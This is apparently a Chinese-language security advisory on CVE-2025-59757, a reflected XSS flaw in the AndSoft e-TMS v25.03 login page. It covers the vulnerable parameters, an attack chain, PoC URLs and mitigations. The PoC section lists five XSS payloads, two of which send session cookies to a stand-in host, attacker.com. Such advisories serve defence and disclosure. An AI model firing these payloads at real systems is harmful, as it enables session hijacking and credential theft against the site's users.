CVE-2025-59757：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59757

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59757 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1 评分为 6.1，属于中危级别。

AndSoft e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理运输订单、车辆调度、货物跟踪等业务流程。该系统在登录页面 `/clt/LOGINFRM_CATOLD.ASP` 中存在多个未经过滤的用户输入参数，具体包括 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 参数。攻击者可以通过构造包含恶意 JavaScript 代码的 URL，诱使受害者点击该链接，从而在受害者的浏览器中执行任意 JavaScript 代码。

由于该漏洞的攻击向量为网络（AV:N），且无需任何权限认证（PR:N），但需要用户交互（UI:R），因此攻击者通常需要通过钓鱼邮件、即时通讯工具或社交工程等方式诱导受害者点击恶意链接。一旦成功利用，攻击者可以窃取用户的会话 cookie、劫持用户会话、进行钓鱼攻击或篡改页面内容，对系统的机密性和完整性造成损害。

该漏洞的 CVSS 向量为 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明漏洞利用复杂度低，作用域发生变化，对机密性和完整性有低影响，但对可用性无影响。

技术细节

该漏洞的根源在于 AndSoft e-TMS v25.03 的登录页面 `/clt/LOGINFRM_CATOLD.ASP` 对用户输入参数缺乏充分的过滤和转义处理。具体而言，`l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 这六个参数在接收用户输入后，未经过 HTML 实体编码或 JavaScript 上下文转义便直接输出到响应页面中。

反射型 XSS 的攻击原理如下：攻击者精心构造一个包含恶意 JavaScript 代码的 URL，该 URL 中的恶意载荷嵌入在上述参数的值中。当受害者通过浏览器访问该 URL 时，服务器将恶意参数值原样返回并嵌入到 HTML 页面中，浏览器解析这些未经转义的内容时便会执行其中的 JavaScript 代码。

利用方式方面，攻击者可以通过以下步骤实施攻击：
1. 构造恶意 URL，将 JavaScript 载荷嵌入到 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 或 `SuppConn` 参数中，例如使用 `<script>alert(document.cookie)</script>` 或更隐蔽的 `onerror` 事件处理器。
2. 通过钓鱼邮件、社交媒体或其他渠道诱导受害者点击该链接。
3. 受害者的浏览器加载恶意 URL 后，服务器将包含恶意脚本的页面返回，浏览器执行其中的 JavaScript 代码。
4. 攻击者利用执行的脚本窃取会话 cookie、重定向用户到恶意网站、或执行其他恶意操作。

由于攻击复杂度低（AC:L）且无需认证（PR:N），该漏洞的利用门槛较低，但需要用户交互（UI:R），因此社会工程学在攻击链中扮演重要角色。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者首先识别目标系统是否运行 AndSoft e-TMS v25.03，并通过访问 /clt/LOGINFRM_CATOLD.ASP 页面确认登录入口的存在。

STEP 2

步骤2：构造恶意 URL

攻击者构造包含恶意 JavaScript 载荷的 URL，将脚本代码嵌入到 l、demo、demo2、TNTLOGIN、UO 或 SuppConn 参数中。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时通讯工具或社交媒体等渠道，将恶意 URL 发送给目标用户，诱导其点击链接。

STEP 4

步骤4：恶意脚本执行

受害者点击恶意 URL 后，浏览器向目标服务器发送请求，服务器将未转义的恶意参数值嵌入响应页面返回，浏览器解析并执行其中的 JavaScript 代码。

STEP 5

步骤5：数据窃取与进一步利用

攻击者利用已执行的恶意脚本窃取用户会话 cookie、重定向用户到钓鱼页面、篡改页面内容或执行其他恶意操作，完成对系统的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59757 - Reflected XSS PoC for AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_CATOLD.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic script injection via 'l' parameter -->
https://target/clt/LOGINFRM_CATOLD.ASP?l=<script>alert('XSS-CVE-2025-59757')</script>

<!-- PoC 2: Cookie stealing via 'demo' parameter -->
https://target/clt/LOGINFRM_CATOLD.ASP?demo=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- PoC 3: Event handler injection via 'TNTLOGIN' parameter -->
https://target/clt/LOGINFRM_CATOLD.ASP?TNTLOGIN=1" onerror="alert('XSS')" x="y

<!-- PoC 4: SVG-based XSS via 'UO' parameter -->
https://target/clt/LOGINFRM_CATOLD.ASP?UO=<svg/onload=alert(document.domain)>

<!-- PoC 5: Session hijacking via 'SuppConn' parameter -->
https://target/clt/LOGINFRM_CATOLD.ASP?SuppConn=<script>fetch('http://attacker.com/log?session='+document.cookie)</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方修复版本发布之前，建议采取以下临时缓解措施：1）对登录页面 /clt/LOGINFRM_CATOLD.ASP 实施访问限制，仅允许可信网络环境访问；2）在 Web 服务器或反向代理层面部署 XSS 过滤规则，对请求参数中的特殊字符（如 <、>、"、' 等）进行过滤或编码；3）为 e-TMS 系统部署 Web 应用防火墙（WAF），配置针对反射型 XSS 的防护规则；4）对系统用户进行安全意识培训，警惕来自不明来源的链接；5）为所有会话 cookie 设置 HttpOnly 标志，降低 cookie 被窃取的风险；6）监控 Web 服务器日志，及时发现可疑的 XSS 攻击尝试。